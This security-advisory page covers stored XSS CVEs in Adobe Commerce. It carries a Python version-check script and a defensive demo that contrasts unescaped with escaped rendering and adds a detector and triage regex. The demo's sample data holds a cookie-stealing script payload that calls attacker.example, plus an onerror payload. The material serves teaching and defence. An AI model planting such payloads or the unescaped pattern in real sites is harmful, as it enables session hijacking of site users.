Mallory

Multiple Stored XSS Vulnerabilities in Adobe Commerce

Tags: internet-facing-service-vulnerability, widely-deployed-product-advisory, identity-authentication-vulnerability
Updated March 21, 2026 at 05:50 AM, 4 sources
Adobe Commerce disclosed multiple stored cross-site scripting (XSS) vulnerabilities affecting versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16, and earlier. The issues, tracked as CVE-2026-21284, CVE-2026-21290, CVE-2026-21311, and CVE-2026-21361, allow malicious JavaScript to be injected into vulnerable form fields and stored by the application; the script then executes in a victim's browser whenever the affected page is viewed. Adobe indicates the impact can include session takeover, with high confidentiality and integrity risk.
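A practical first check is whether a given install falls inside the affected ranges listed above. The following is an added example, not Adobe's or Mallory's code: it orders Adobe Commerce version strings so that pre-release builds (-alphaN, -betaN, -rcN) sort before the GA build and security patches (-pN) sort after it, then tests an installed version against the listed thresholds. The version-string format and the reading of "and earlier" are assumptions taken from the advisory text; builds the page does not list (for example a 2.4.9 GA release or a newer branch) return False here and should be checked against Adobe's bulletin rather than taken as safe.

```python
import re

# Highest affected build per branch, as listed in this advisory summary.
# Everything at or below these, and every older branch, is "affected" per the text.
AFFECTED_UP_TO = ["2.4.9-alpha3", "2.4.8-p3", "2.4.7-p8",
                  "2.4.6-p13", "2.4.5-p15", "2.4.4-p16"]

# Assumed version grammar: MAJOR.MINOR.PATCH with an optional -alphaN/-betaN/-rcN
# pre-release suffix or a -pN security-patch suffix.
_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)\.(\d+)(?:-(alpha|beta|rc|p)(\d+))?$", re.IGNORECASE)

# Pre-release stages rank below the GA build (None); -pN patches rank above it.
_STAGE_RANK = {"alpha": 0, "beta": 1, "rc": 2, None: 3, "p": 4}


def version_key(version: str) -> tuple:
    """Sortable key for an Adobe Commerce version string.

    2.4.9-alpha3 < 2.4.9 < 2.4.9-p1, and 2.4.8-p3 < 2.4.8-p4.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, stage, num = m.groups()
    stage = stage.lower() if stage else None
    return (int(major), int(minor), int(patch), _STAGE_RANK[stage], int(num or 0))


def branch(version: str) -> tuple:
    """The MAJOR.MINOR.PATCH triple a build belongs to, e.g. (2, 4, 8) for 2.4.8-p3."""
    return version_key(version)[:3]


def is_affected(installed: str, thresholds=AFFECTED_UP_TO) -> bool:
    """True if `installed` is at or below the listed affected build for its branch,
    or older than the oldest listed branch (the advisory's "and earlier").

    Builds newer than every listed threshold in their branch (e.g. 2.4.8-p4) and
    branches the page does not list return False; confirm those against the
    vendor bulletin rather than treating this as proof of safety.
    """
    k = version_key(installed)
    for t in thresholds:
        if branch(t) == k[:3]:
            return k <= version_key(t)
    oldest = min(version_key(t) for t in thresholds)
    return k < oldest


if __name__ == "__main__":
    for v in ["2.4.8-p3", "2.4.8-p4", "2.4.9-alpha3", "2.4.9", "2.4.3", "2.4.6"]:
        print(f"{v:14} affected={is_affected(v)}")
```

Run it against the version reported by `bin/magento --version` on each instance; any True result means the host sits inside a range the advisory names.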

The vulnerabilities differ primarily in the privilege level required to plant the payload: most require a high-privileged attacker, while at least one (CVE-2026-21290) is exploitable by a low-privileged attacker. In all cases exploitation requires user interaction, because a victim must browse to the page containing the injected content. Since the injected script runs with the session of whoever views the page, the low-privileged case is the one to prioritise: a payload planted by a low-privileged account and later viewed by an administrator executes in the administrator's session.
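To make the stored-XSS mechanism and its fix concrete, here is an added example in Python (not Adobe Commerce code, which is PHP; the field names and payloads are constructed for illustration). It shows the vulnerable pattern of concatenating a stored form value into HTML, the hardened pattern of escaping on output, a parser-based check that the escaped rendering yields no script element or event-handler attribute, and a triage regex for sweeping already-stored field values for planted payloads, which is the check a responder wants after patching, since the patch does not remove what an attacker already stored.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample of stored form-field values (not real Adobe Commerce data):
# an attacker with the privilege to submit these fields plants the payload once,
# and every later viewer of the page runs it.
STORED_FIELDS = {
    "product_review": "Great product! <script>fetch('https://attacker.example/?c='"
                      "+document.cookie)</script>",
    "customer_name": "Alice <img src=x onerror=alert(document.cookie)>",
    "plain_comment": "Arrived on time, 5/5 would buy again",
}


def render_unsafe(label: str, value: str) -> str:
    """Vulnerable pattern: the stored value is concatenated into HTML unescaped."""
    return f"<div class='field'><b>{label}</b>: {value}</div>"


def render_safe(label: str, value: str) -> str:
    """Hardened pattern: escape on output for the HTML text context.
    quote=True also neutralises ' and ", which matters inside attribute values."""
    return (f"<div class='field'><b>{html.escape(label, quote=True)}</b>: "
            f"{html.escape(value, quote=True)}</div>")


class ActiveContentFinder(HTMLParser):
    """Collects script elements, on* handlers and javascript: URLs from markup.
    Escaped text never reaches handle_starttag, so a clean render yields no findings."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script", None))
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.findings.append((tag, name))
            elif (name.lower() in ("href", "src") and value
                  and value.strip().lower().startswith("javascript:")):
                self.findings.append((tag, name))


def find_active_content(markup: str) -> list:
    """Tokenise rendered markup as a browser would and report active content found."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


# Triage heuristic for sweeping stored values after the fact (database export,
# admin UI dump). It is deliberately simple and will miss encoded or split payloads;
# treat hits as leads to review, not as a complete detector.
PAYLOAD_MARKERS = re.compile(
    r"<\s*script\b|<\s*\w+[^>]*\son[a-z]+\s*=|javascript:", re.IGNORECASE)


def audit_stored_fields(fields: dict) -> dict:
    """Return the stored fields whose value carries an active-content marker."""
    return {k: v for k, v in fields.items() if PAYLOAD_MARKERS.search(v)}


if __name__ == "__main__":
    for name, value in STORED_FIELDS.items():
        print(name, "unsafe:", find_active_content(render_unsafe(name, value)))
        print(name, "safe:  ", find_active_content(render_safe(name, value)))
    print("suspicious stored fields:", sorted(audit_stored_fields(STORED_FIELDS)))
```

The parser check is the useful one for verifying a fix: a naive substring test on the escaped output would still find the text `onerror=` and report a false positive, whereas tokenising the markup shows that the escaped value never becomes a tag or attribute. The audit regex is the opposite trade-off, cheap enough to run across every stored free-text column but only a starting point for review.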

Timeline

  1. Mar 11, 2026

    Adobe discloses multiple Adobe Commerce stored XSS vulnerabilities

    Adobe Commerce vulnerabilities CVE-2026-21284, CVE-2026-21290, CVE-2026-21311, and CVE-2026-21361 were published as stored cross-site scripting flaws affecting multiple versions up to specific patch levels, including 2.4.9-alpha3 in several cases. The issues could allow attackers to inject malicious scripts into form fields and potentially hijack user sessions when victims view affected pages.

Related Stories

Critical Adobe Commerce Session Hijack Flaw Added to KEV After Active Exploitation

Adobe released an out-of-band fix for **CVE-2025-54236**, a critical improper input validation flaw in **Adobe Commerce**, **Adobe Commerce B2B**, and **Magento Open Source** that allows unauthenticated attackers to take over user sessions through vulnerable session-handling and Web API components. The bug, dubbed **"SessionReaper"** by Sansec, carries a reported **CVSS 9.1** rating and can lead to account hijacking, exposure of customer data, fraudulent orders, administrative access, and in some scenarios potentially remote code execution. Affected releases span multiple 2.4.x branches, including versions from **2.4.4 through 2.4.7** and other listed builds and earlier releases. Security guidance escalated after reports said the flaw was being actively exploited in the wild and added to **CISA's Known Exploited Vulnerabilities** catalog. Adobe published remediation details in **APSB25-88** and shipped patched versions, while defenders were urged to apply the vendor fix immediately, verify patch status, review logs for anomalous session activity, tighten administrative access, and increase **WAF**, API, and **SIEM** monitoring. Advisories also warned that leaked hotfix details and unofficial fixes could accelerate attacker weaponization or create additional risk.

1 week ago
Adobe Connect Patches Reflected XSS Flaws Allowing Script Execution via Crafted URLs

Adobe disclosed two high-severity reflected cross-site scripting vulnerabilities in **Adobe Connect**—`CVE-2026-27245` and `CVE-2026-27243`—affecting versions **2025.3, 12.10, and earlier**. The flaws allow an attacker to trigger execution of malicious JavaScript in a victim’s browser if the victim is persuaded to open a specially crafted URL pointing to a vulnerable page. Both issues are classified as **CWE-79** and carry the same **CVSS v3.1** vector, `AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N`, indicating network-reachable exploitation with no privileges required but user interaction needed. Adobe referenced the vulnerabilities in security bulletin **APSB26-37**, and the changed scope plus high confidentiality and integrity impact suggest successful exploitation could let attackers act within the victim’s browser session and compromise exposed application data or actions.

2 weeks ago
Adobe Connect Flaws Expose Users to XSS and Potential Code Execution

Adobe disclosed two high-severity vulnerabilities in **Adobe Connect** affecting versions **2025.3, 12.10, and earlier**, and directed customers to advisory **`APSB26-37`** for remediation. One issue, **`CVE-2026-27246`**, is a DOM-based cross-site scripting flaw classified as **`CWE-79`** that can let an attacker manipulate the browser DOM and run malicious JavaScript in a victim’s session after luring the user to a crafted webpage. The vulnerability carries a CVSS v3.1 vector of **`AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N`**, indicating network reachability, low attack complexity, no privileges required, and high confidentiality and integrity impact. Adobe also disclosed **`CVE-2026-34615`**, a **`CWE-502`** deserialization of untrusted data vulnerability in the same product versions that can lead to arbitrary code execution in the context of the current user. Adobe said exploitation of the deserialization flaw does not require user interaction, making it the more serious of the two issues, while both bugs were published through Adobe’s PSIRT process and affect the same supported and earlier Adobe Connect releases. Organizations using Adobe Connect should prioritize patching exposed deployments and reviewing the vendor advisory for fixed versions and mitigation guidance.

2 weeks ago